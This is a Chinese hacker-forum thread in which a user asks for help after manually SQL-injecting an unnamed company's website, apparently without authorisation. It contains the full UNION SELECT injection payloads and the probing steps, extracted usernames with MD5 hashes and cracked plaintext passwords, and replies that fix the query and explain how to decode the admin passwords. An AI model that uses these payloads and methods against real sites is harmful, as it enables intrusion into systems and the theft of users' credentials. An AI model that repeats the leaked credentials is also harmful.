[讨论]关于手动注入的问题 请高手来帮忙解决下
[讨论]关于手动注入的问题 请高手来帮忙解决下信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
议题作者:哈破boy
这是关于SQL手动注入的一个问题
今天晚上, 我找了一个企业网站,通过命令and 1=1 和 and 1=2 发现了有注入漏洞
相继猜出字段数目是15,有两个表名 分别是 user 和 manage_User
可是,问题出在 在我猜用户和密码的时候 返回的用户:BlueM MD5密码是:49ba59abbe56e057 经解密:123456
在后台登陆时,密码错误. 前台登陆一样密码错误!
后来我用DOMIAN3.5来试了下 扫出user下有两个用户名 一个用户名是BlueM 对应MD5密码是:b51a468e87e07820 经解密:369258
另一个用户名是:xiaoyang 对应MD5密码是:49ba59abbe56e057 经解密:123456
manage_user下也有两个用户名: 一个用户名是:admin 密码是:2;;588<< 另一个用户是f77465g 密码是:586:,>erd
我用user下的两个用户登陆后台 提示帐户不存在或者密码错误, 在前台登陆帐户密码对了...我发现手动猜USER的时候密码用户怎么显示BlueM 而加密的密码是xiaoyang这个帐户的加密密码???
这是问题1
命令是: and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from user (回车)
and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示正常,页面显示 3>>4>>6)
and%201=2%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示:3>>49ba59abbe56e057>>6)
and%201=2%20union%20select%201,2,3,username,5,6,7,8,9,10,11,12,13,14,15%20from%user (页面显示:3>>BlueM>>6)
为什么会出现这种情况??? 麻烦高手解答下
当用manage_user下的两个用户登陆后台时: 提示帐户不存在或者密码错误, 在前台登陆时也一样提示帐户不存在或者密码错误!为什么会这样?这是问题2
小弟先在这真心的感谢下回帖的人.永远为爱自己活者
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=153796]0[/url] 积分23 阅读权限40 性别男 在线时间9 小时 注册时间2007-12-24 最后登录2008-6-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=153796]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-80082.html]沉渊[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 and%201=2%20union%20select%201,2,username,password,5,6,7,8,9,10,11,12,13,14,15%20from%user
至于2个密码,第一个19813254,第二个有点不大对头,貌似是 4636'8^j[ ?Dreamless world……
帖子25 精华[url=http://forum.eviloctal.com/digest.php?authorid=80082]0[/url] 积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=80082]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-136000.html]fucking[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 我觉得应该效验下数据库的真实性,我以前也经常遇到比如猜出了用户名密码,但是就是无法登陆(其实这种情况有很多说法,比如后台做了安全策略,限制了登陆IP点。。),其实好多管理员喜欢这样娱乐我们这些脚本小子啦。。。哈哈。。。
帖子28 精华[url=http://forum.eviloctal.com/digest.php?authorid=136000]0[/url] 积分103 阅读权限40 性别男 在线时间124 小时 注册时间2007-8-19 最后登录2008-6-6 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=136000]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-118275.html]knlve[/url] [img]http://forum.eviloctal.com/customavatars/118275.jpg[/img]
晶莹剔透§烈日灼然 后台可能是假的!‘.黒皕甡萿.…
[url=http://wpa.qq.com/msgrd?V=1&Uin=878792&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子10 精华[url=http://forum.eviloctal.com/digest.php?authorid=118275]0[/url] 积分37 阅读权限40 性别男 在线时间15 小时 注册时间2007-5-5 最后登录2008-2-13 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=118275]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-65230.html]akens[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 2;;588<<和586:,>erd 这两个密码也是被加密了的
有解这种密码的小工具
帖子22 精华[url=http://forum.eviloctal.com/digest.php?authorid=65230]0[/url] 积分59 阅读权限40 性别男 在线时间106 小时 注册时间2006-9-30 最后登录2008-6-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=65230]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-66411.html]hackest[/url] [img]http://forum.eviloctal.com/customavatars/66411.gif[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] D:\pass\decode>decode.exe
******************************************
欢迎使用此解密工具^_^
附件
[img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=1334¬humb=yes]pass.jpg[/url] (38 KB)
2008-1-1 12:44
[img]http://forum.eviloctal.com/attachments/Mon_0801/9_66411_855d19a1e02e408.jpg[/img]My Blog:http://www.hackest.cn/ [H.S.T]:http://www.hackm.com/
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=297521327&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子882 精华[url=http://forum.eviloctal.com/digest.php?authorid=66411]20[/url] 积分5849 阅读权限150 性别男 来自广东 在线时间941 小时 注册时间2006-10-12 最后登录2008-3-3 [url=http://www.hackest.cn/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=66411]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-153796.html]哈破boy[/url] [img]http://forum.eviloctal.com/images/avatars/pw/matrix1.jpg[/img]
晶莹剔透§烈日灼然 老大 你这个 破密码的 软件能不能提供下啊永远为爱自己活者
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=153796]0[/url] 积分23 阅读权限40 性别男 在线时间9 小时 注册时间2007-12-24 最后登录2008-6-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=153796]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-74560.html]anki[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 密码再解密下就好随风破解软件也可以破解。。呵呵
帖子34 精华[url=http://forum.eviloctal.com/digest.php?authorid=74560]0[/url] 积分129 阅读权限40 性别男 在线时间12 小时 注册时间2007-1-25 最后登录2008-5-21 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=74560]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-120488.html]icefox.eer[/url] [img]http://forum.eviloctal.com/images/avatars/pw/univer2.gif[/img]
晶莹剔透§烈日灼然 密文的ascii码减去密文所在位置,可以自己写解码的程序。
帖子1 精华[url=http://forum.eviloctal.com/digest.php?authorid=120488]0[/url] 积分6 阅读权限40 性别男 在线时间0 小时 注册时间2007-5-9 最后登录2008-1-12 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=120488]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-153796.html]哈破boy[/url] [img]http://forum.eviloctal.com/images/avatars/pw/matrix1.jpg[/img]
晶莹剔透§烈日灼然 引用:
引用第5楼hackest于2008-01-01 12:44发表的 :
D:passdecode>decode.exe
******************************************
欢迎使用此解密工具^_^ *
by:hackest[E.S.T] *
欢迎访问:[url=http://forum.eviloctal.com/]http://forum.eviloctal.com/[/url] *
.......
还是找不到解这种密文的工具..... 又谁能帮下忙????永远为爱自己活者
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=153796]0[/url] 积分23 阅读权限40 性别男 在线时间9 小时 注册时间2007-12-24 最后登录2008-6-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=153796]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-128469.html]silenceshell[/url] [img]http://forum.eviloctal.com/images/avatars/pw/mon4.gif[/img]
晶莹剔透§烈日灼然 嗯...楼上的找到了给我分享一下,
我也经常遇到这个问题
[url=http://forum.eviloctal.com/mailto:hidehai@yeah.net]hidehai@yeah.net[/url]show more..
[url=http://wpa.qq.com/msgrd?V=1&Uin=18354500&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子35 精华[url=http://forum.eviloctal.com/digest.php?authorid=128469]0[/url] 积分111 阅读权限40 在线时间65 小时 注册时间2007-6-22 最后登录2008-7-15 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=128469]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-151096.html]awolf[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然 加密算法貌似和雷池新闻系统的一样!
如果一样的话,你可以用这个试试!
[url=http://bbs.awolf07.cn/viewthread.php?tid=107&extra=page%3D1]http://bbs.awolf07.cn/viewthread.php?tid=107&extra=page%3D1[/url]
貌似一样的解法!
竟然这个真和雷池加密一样算法,看我解密结果:
[img]http://pic.yupoo.com/awolf07/932664eb941d/4llaj1kc.jpg[/img]
[img]http://pic.yupoo.com/awolf07/089184eb941c/9wtg97jf.jpg[/img]
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-46249.html]杀虫剂[/url] [img]http://forum.eviloctal.com/images/avatars/pw/tm2.jpg[/img]
晶莹剔透§烈日灼然 hackest 用你在网上公布的代码编译了下,,密码解不出哦。
[img]http://forum.eviloctal.com/images/smilies/yangcong/61.gif[/img]黎叔很生气
[url=http://wpa.qq.com/msgrd?V=1&Uin=395697379&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子70 精华[url=http://forum.eviloctal.com/digest.php?authorid=46249]0[/url] 积分161 阅读权限40 性别男 在线时间84 小时 注册时间2006-4-27 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=46249]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-151096.html]awolf[/url] [img]http://forum.eviloctal.com/images/avatars/06.gif[/img]
晶莹剔透§烈日灼然 楼上的朋友试试我的工具。。。貌似和hackest的一样的原理,上次解密出来的结果一样的,只是我是vb的
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=151096]0[/url] 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=151096]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-141974.html]dongxuewuhen[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]